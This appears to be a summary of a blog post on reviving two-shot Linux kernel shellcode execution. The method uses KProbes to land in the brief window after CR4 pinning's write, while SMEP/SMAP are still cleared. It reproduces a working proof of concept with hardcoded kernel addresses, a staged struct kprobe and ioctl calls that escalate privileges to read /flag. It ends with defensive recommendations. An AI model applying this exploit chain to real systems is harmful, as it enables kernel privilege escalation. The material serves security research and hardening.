Executive Summary
Andrey Konovalov’s 2017 Project Zero write-up showed a clean way to turn a control-flow hijack on the Linux kernel into shellcode execution: pivot into native_write_cr4 with RDI set to a value that clears SMEP and SMAP, then return to a user-space buffer. CR Pinning, introduced upstream in 2019, killed that exact trick: native_write_cr4 now compares the value just written to a pinned mask and, if the protected bits differ, loops back and re-writes the correct ones before returning.
This post revives the technique. The author observes that there is a real architectural window between the mov %rsi, %cr4 instruction and the fixup branch — a handful of instructions where SMEP and SMAP are still cleared. Plain preemption inside that window is unrealistic, but KProbes lets you put a software breakpoint exactly there, and have your KProbe handler do whatever you want before control ever reaches the fixup. The whole exploit becomes two control-flow hijacks: one to set up the probe with attacker-controlled data, one to take the bait and execute user-supplied shellcode in ring 0 with the protections off. The post ends with a working PoC against a custom CTF-style kernel module.
The starting point is the original primitive: a kernel control-flow hijack where the attacker controls RIP and at least one register-passed argument. The 2017 PoC pointed RIP at native_write_cr4 with RDI set to a value missing the X86_CR4_SMEP and X86_CR4_SMAP bits, then returned to a user-space stub that did the rest. Modern Linux still has the same function, but the source now looks like this — the snippet below is reproduced verbatim:
static const unsigned long cr4_pinned_mask = X86_CR4_SMEP | X86_CR4_SMAP | X86_CR4_UMIP |
X86_CR4_FSGSBASE | X86_CR4_CET | X86_CR4_FRED;
static DEFINE_STATIC_KEY_FALSE_RO(cr_pinning);
static unsigned long cr4_pinned_bits __ro_after_init;
void __no_profile native_write_cr4(unsigned long val)
{
unsigned long bits_changed = 0;
set_register:
asm volatile("mov %0,%%cr4": "+r" (val) : : "memory");
if (static_branch_likely(&cr_pinning)) {
if (unlikely((val & cr4_pinned_mask) != cr4_pinned_bits)) {
bits_changed = (val & cr4_pinned_mask) ^ cr4_pinned_bits;
val = (val & ~cr4_pinned_mask) | cr4_pinned_bits;
goto set_register;
}
WARN_ONCE(bits_changed, "pinned CR4 bits changed: 0x%lx!?n",
bits_changed);
}
}
Source: original article.
The set_register: label is the heart of the mitigation. The CR4 write happens unconditionally; the fixup then checks the pinned bits, builds a corrected val, and gotos back. So SMEP/SMAP really do get cleared — for the few instructions it takes to reach the fixup. Then they get put back. Everything that follows is about being something that runs in those few instructions.
Mind The Gap
The author first reaches for the obvious idea: cause a preemption inside the window. On a preemptible kernel, an IRQ or a forced reschedule between mov %rsi, %cr4 and the comparison would let user space run with SMEP and SMAP cleared. In practice this is impractical — the window is on the order of a handful of instructions, and there is no reliable way to land precisely there from a user-controlled trigger. So the question becomes: is there any way to deterministically redirect control out of the window before the fixup loops back?
The post points out that the same instruction sequence appears elsewhere in the kernel — for example in sev_verify_cbit, which has its own mov ..., cr4 followed by a short tail. The disassembly reproduced from the original is below:
<sev_verify_cbit+69>: mov cr4,rsi
<sev_verify_cbit+72>: je 0xffffffff810003f7 <sev_verify_cbit+87>
<sev_verify_cbit+74>: xor rsp,rsp
<sev_verify_cbit+77>: sub rsp,0x1000
<sev_verify_cbit+84>: hlt
<sev_verify_cbit+85>: jmp 0xffffffff810003f4 <sev_verify_cbit+84>
<sev_verify_cbit+87>: mov rax,rdi
<sev_verify_cbit+90>: jmp 0xffffffff82142cc0 <srso_alias_return_thunk>
Source: original article.
The shape is exactly the same: a mov ..., cr4 followed by control-flow instructions. The author’s reframe of the problem is the load-bearing insight: you do not need to land in the window by accident, and you do not need to wait for an interrupt — you can ask the kernel itself to put a software breakpoint there, and arrange for the breakpoint handler to do what you want.
KProbing
The mechanism is KProbes. From inside the kernel, register_kprobe takes a struct kprobe with three fields the technique cares about: addr (the instruction to break on), pre_handler (a callback fired before that instruction executes), and post_handler (a callback fired after). KProbes patches the target instruction with an int3 at registration time; when execution reaches the patched site, the breakpoint fires, the kernel saves the trapped struct pt_regs, and the handler is invoked with that pt_regs pointer in RDI.
The plan, then, is:
- Set the probe’s
addrto an instruction inside the gap — somewhere between themov %rsi, %cr4and the fixup’sgoto set_register. (Or, equivalently, insidesev_verify_cbitat the same offset relative to its ownmov ..., cr4.) When the breakpoint fires,SMEPandSMAPare still cleared in CR4 because the fixup has not run yet. - Set the probe’s
pre_handlerto an attacker-supplied address — in the PoC, a user-space function the kernel will call withRDI = pt_regs*. WithSMEPandSMAPcleared, the call into a user-space handler from kernel mode actually works. - Inside the handler, do whatever the original 2017 trick wanted to do —
commit_creds(prepare_kernel_cred(0)), read/flag, spawn a shell. With the handler running in ring 0 (it’s a kernel call, even if the target page is user-space), it has full kernel privileges; the only reason it’s allowed to dereference user-space code is thatSMEPis currently off.
That gets shellcode running in the gap. The cost is that register_kprobe needs an actual struct kprobe — specifically a kernel-resident struct kprobe — whose fields the attacker controls. That is the next problem the post solves.
Arguments
The starting primitive is a controlled call (RIP, RDI), where RDI is whatever the attacker put there. To call register_kprobe(&kp), the attacker needs RDI to point at a struct kprobe whose addr, pre_handler, and post_handler they fully control — and the struct has to be in kernel memory, because register_kprobe dereferences it before any of the shellcode mechanics can help.
The post uses two ideas to bridge that gap:
- A useful gadget called
devm_action_release, whose signature ends up doing roughly “callaction(data)on caller-supplied arguments,” effectively turning a single arbitrary-call primitive into a two-argument call — the attacker can pass both a target function address and a data pointer in a controlled way. - The NPerm technique (by n132, originally demonstrated for CVE-2025-38477) for getting attacker-controlled bytes into a known-address kernel allocation. NPerm gives the exploit a predictable kernel address it can write structured data into and then point the kernel at — in this case, two
struct pc_argrecords and a fully-populatedstruct kprobe.
With NPerm staging the data and devm_action_release turning a one-arg call into a two-arg call, the exploit can:
- Use the first control-flow hijack to call
register_kprobewithRDIpointing at the stagedstruct kprobe, registering a probe whoseaddris an instruction in the CR4 gap and whosepre_handleris a user-space function. - Use the second control-flow hijack to call a function that actually executes the
mov ..., cr4— e.g.native_write_cr4itself, orsev_verify_cbit— tripping the probe.
That is the “two-shot” from the title.
Draw the Rest of the Owl
The PoC ties it together. It opens /proc/dbg-mod (the test driver providing the arbitrary-call primitive via an ioctl), uses NPerm to stage a payload at a guessed kernel address (0xffffffff84c11000) containing a fully-formed struct kprobe plus two struct pc_arg records, and then fires the two ioctl calls. Each ioctl hands devm_action_release a different (pc, a0) pair so the two control-flow hijacks do two different things: the first registers the probe, the second triggers it. The full PoC is reproduced verbatim from the original:
struct pc_arg {
u64 a0;
u64 pc;
};
struct nperm_payload {
struct kprobe kp;
struct pc_arg pa1;
struct pc_arg pa2;
};
void from_kernel() {
int uid = getuid();
char flag[0x20] = {0};
int flag_fd = open("/flag", O_RDONLY);
read(flag_fd, flag, sizeof(flag));
write(1, flag, sizeof(flag));
while (1) {}
}
int main(int argc, char **argv) {
struct arb_call_req req;
u64 kaslr_base = 0xffffffff81000000;
u32 dbg = open("/proc/dbg-mod", 2);
sandbox();
save_state();
u64 nperm_addr_guess = 0xffffffff84c11000;
struct nperm_payload payload = {
.kp = {
.addr = (void *)0xffffffff8107220e,
.pre_handler = escalate_privs,
.post_handler = (void *)0xdeadbeefcafeb0ba,
},
.pa1 = {
.pc = 0xffffffff812542d0,
.a0 = nperm_addr_guess,
},
.pa2 = {
.pc = 0xffffffff81072200,
.a0 = 0x450ef0,
},
};
nperm(&payload, sizeof(payload));
u64 devm_action_release = 0xffffffff81b24770;
req.pc = devm_action_release;
req.a0 = 0xdeadbeef;
req.a1 = nperm_addr_guess + offsetof(struct nperm_payload, pa1);
ioctl(dbg, 1337, &req);
req.pc = devm_action_release;
req.a0 = 0xdeadbeef;
req.a1 = nperm_addr_guess + offsetof(struct nperm_payload, pa2);
ioctl(dbg, 1337, &req);
return 0;
}
Source: original article.
The shape lines up with what the prose described: kp.addr is an instruction inside the CR4 gap, kp.pre_handler is escalate_privs (the attacker’s user-mode handler), pa1 hands devm_action_release the arguments needed to register the probe, and pa2 hands it the arguments needed to call into the function containing the probed instruction. Two ioctls, two control-flow hijacks; afterwards, escalate_privs runs in ring 0 with SMEP/SMAP cleared, and from_kernel reads /flag.
Conclusion (Original)
The post closes with two reflections worth carrying forward. First, the trick generalises: anywhere the kernel writes a security-relevant CPU register and then fixes it up in software, there is a window between the write and the fixup. CR4 pinning is the cleanest example, but the same structure exists for CR0 pinning and arguably for any “write, then validate” mitigation. Second, the author calls out that pt_regs-driven chaining (i.e., using the breakpoint-saved pt_regs as a vehicle to chain into further primitives) has practical limits because not every register is preserved through the trap path; this is where the author coins the half-joking term KPOP (KProbe-Oriented Programming) as a future direction, and notes the limitations they ran into when trying to chain further useful side effects through it.
Key Takeaways
- CR4 pinning kills the literal 2017 Konovalov trick (point
RIPatnative_write_cr4,RDIat a value withoutSMEP/SMAP, return to user-space) — but only because the fixup loop puts the bits back. The window in between still hasSMEP/SMAPcleared. - KProbes is a perfect vehicle for landing deterministically inside that window: it patches the target instruction with
int3and runs an attacker-suppliedpre_handlerwith apt_regs*inRDIbefore the original instruction executes. - Inside the handler,
SMEPis still off, so calling a user-mode function from kernel context works — the “handler” can simply be a user-space pointer that does the credential-promotion and reads the flag. - The supporting primitives are
devm_action_release(one-arg arbitrary-call promoted to a two-arg call) and the NPerm technique (n132, used for CVE-2025-38477) for placing a fully-formedstruct kprobeat a known kernel address. - The exploit becomes two control-flow hijacks: one to register the probe, one to trigger it — hence “two-shot.”
- The same structural pattern (write, then fix up) likely exists for other pinned-register mitigations and is worth checking for analogous gadgets.
pt_regs-driven chaining (“KPOP”) is real but not free — not every register survives the trap path cleanly.
Defensive Recommendations
- Disable KProbes in production kernels wherever your threat model allows.
CONFIG_KPROBES=nremovesregister_kprobeentirely and breaks this specific bridge. If you need it for instrumentation, gate it behindkernel.kprobes_disable_stateat runtime and audit who can flip it. - Enable
kernel.unprivileged_bpf_disabledand lock down other in-kernel callback-registration paths (BPF, tracepoint registration, perf events) for non-root contexts — the technique generalises to anywhere you can register an attacker-supplied callback to fire inside a guarded code window. - Treat the “write-then-fix-up” mitigation pattern as a known gap. If you maintain a fork or write similar mitigations, prefer an unconditional restoration sequence with no instructions between the write and the recompare — or wrap the entire sequence in
local_irq_save/preempt_disableand an explicitBUG_ONon detected divergence so even an arbitrary trap landing in the window is fatal rather than exploitable. - Make
devm_action_release-class “call function with data” gadgets harder to abuse. Audit the kernel for one-arg arbitrary-call wrappers that effectively promote to two-arg calls; consider control-flow integrity (CFI/kCFI) configurations that include indirect-call type checking. - Adopt FineIBT / kCFI and Shadow Stack on x86 where supported. They do not directly close this window, but they raise the cost of acquiring the underlying control-flow-hijack primitive in the first place.
- Monitor for the precondition. If your detection stack can see
register_kprobecalls from unexpected callers or KProbe registrations whose handlers point to non-kernel addresses, alert — both are extraordinarily anomalous on a production endpoint. - Keep KASLR aggressive and combine it with FG-KASLR / function-granular randomisation where possible. The PoC happily uses known addresses; in the field, an attacker without a KASLR leak does not get to write “
0xffffffff8107220e” into astruct kprobe. - Track CVE-2025-38477-class NPerm-style primitives in your patching workflow. The technique here leans on a separate primitive that lets the attacker place structured data at a known kernel address; cutting off that primitive removes a critical stepping stone.
Conclusion
The 2017 Project Zero technique is not dead — it is one trap-handler away. CR pinning solved the wrong half of the problem: it makes the wrong CR4 value transient rather than impossible, and the entire exploitation surface lives in the time it takes the fixup loop to come around. KProbes turns that time window into a deterministic entry point, NPerm provides the kernel-addressable scratch space, and a small chain on top of a single arbitrary-call primitive does the rest. The broader lesson for kernel hardening: write-then-validate is structurally weaker than validate-then-write, and any mitigation that uses the former should assume an attacker can land code precisely between the two halves.
Original text: “Revisiting Two-Shot Kernel Shellcode Execution From Control Flow Hijacking” by zolutal at zolutal’s blog.

